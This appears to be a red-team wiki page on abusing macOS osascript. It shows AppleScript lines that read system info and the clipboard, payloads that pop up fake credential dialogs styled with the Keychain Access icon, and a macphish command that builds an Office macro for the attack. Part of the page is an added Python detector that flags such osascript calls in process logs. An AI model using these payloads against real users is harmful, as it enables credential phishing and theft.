Osascript

Paulino Calderon edited this page Sep 17, 2017 · 4 revisions

Osascript is a utility installed on every Mac that executes AppleScript scripts. While system events are blocked, attackers still have full access to the dialog functions, allowing them to create dialogs, input text boxes and buttons, obtain system information and read the system clipboard. Attackers can abuse this functionality to launch phishing attacks against users, capturing their keystrokes and using network resources to exfiltrate the captured information.

System information

We can access interesting system information with the 'system info' command.

return (system info)

{AppleScript version:"2.5", AppleScript Studio version:"1.5.3", system version:"10.11.6", short user name:"user", long user name:"user", user ID:501, user locale:"en_US", home directory:alias "a1b2c3:Users:user:", boot volume:"a1b2c3", computer name:"user", host name:"workstation-1", IPv4 address:"192.168.1.68", primary Ethernet address:"78:31:c1:c1:9c:0a", CPU type:"Intel x86-64h Haswell", CPU speed:2300, physical memory:16384}

Clipboard

We can also access the user's clipboard.

return (the clipboard)

Phishing with osascript

We can attempt credential phishing with the help of osascript. For example, an AppleScript payload that generates an input box asking for credentials:

do shell script "/usr/bin/osascript -e 'display dialog \"eaea\" & return & return default answer \"\" with icon caution with hidden answer with title \"eaeaeaeaea\"'"

We can customize the icon shown in the dialog by specifying 'with icon file':

do shell script "/usr/bin/osascript -e 'display dialog \"eaea\" & return & return default answer \"\" with icon file \"Applications:Utilities:Keychain Access.app:Contents:Resources:AppIcon.icns\" with hidden answer with title \"eaeaeaeaea\"'"
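From the defender's side, the AppleScript features this page walks through (inline `display dialog ... with hidden answer` prompts, `with icon file`, `the clipboard`, `system info`) are also the strings to look for in process-execution telemetry. The following script is an added example, not part of this wiki or of macphish; it assumes a constructed log format of timestamp, user, pid and command line, and flags inline osascript invocations that match those indicators:

```python
import re

# Constructed sample process-execution log lines (not real telemetry), in the form
# "<timestamp> <user> <pid> <command line>" as an EDR or unified-log export might emit.
SAMPLE_LOG = """\
2017-09-17T10:01:02Z user 4120 /usr/bin/osascript -e display dialog "eaea" & return & return default answer "" with icon caution with hidden answer with title "eaeaeaeaea"
2017-09-17T10:01:05Z user 4131 /usr/bin/osascript -e return (the clipboard)
2017-09-17T10:02:00Z user 4140 /usr/bin/osascript /Users/user/Library/Scripts/resize_windows.scpt
2017-09-17T10:03:10Z user 4155 /usr/bin/osascript -e return (system info)
2017-09-17T10:04:00Z user 4162 /usr/bin/osascript -e display dialog "eaea" & return & return default answer "" with icon file "Applications:Utilities:Keychain Access.app:Contents:Resources:AppIcon.icns" with hidden answer with title "eaeaeaeaea"
"""

# (tag, severity, pattern): the AppleScript features described in the text above.
INDICATORS = [
    ("credential_prompt", "high",
     re.compile(r"display dialog.*default answer.*hidden answer", re.I)),
    ("dialog_prompt", "medium", re.compile(r"display dialog.*default answer", re.I)),
    ("custom_icon", "medium", re.compile(r"with icon file", re.I)),
    ("clipboard_read", "medium", re.compile(r"\bthe clipboard\b", re.I)),
    ("system_recon", "low", re.compile(r"\bsystem info\b", re.I)),
]
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<user>\S+)\s+(?P<pid>\d+)\s+(?P<cmd>.*)$")

def classify_osascript(cmdline):
    """Return the indicator tags an osascript command line matches ([] if none)."""
    if "osascript" not in cmdline:
        return []
    tags = [tag for tag, _, pat in INDICATORS if pat.search(cmdline)]
    # A hidden-answer prompt is a more specific form of a dialog prompt; keep only the former.
    if "credential_prompt" in tags and "dialog_prompt" in tags:
        tags.remove("dialog_prompt")
    return tags

def scan_log(text):
    """Parse log lines; return one finding per osascript invocation that matched an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        tags = classify_osascript(m.group("cmd"))
        if not tags:
            continue
        severity = max((sev for tag, sev, _ in INDICATORS if tag in tags), key=SEVERITY_RANK.get)
        findings.append({"ts": m.group("ts"), "user": m.group("user"),
                         "pid": int(m.group("pid")), "tags": tags, "severity": severity})
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports the four inline invocations and leaves the script-file execution (pid 4140) alone; in practice the `ts`/`user` fields are what you pivot on to find the parent process that launched osascript.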

Generating the payloads with macphish

Macphish can generate an Office macro, working with Office 2011 and 2016, that implements this credential-phishing attack.

$ ./macphish.py -lh <host> -m -a creds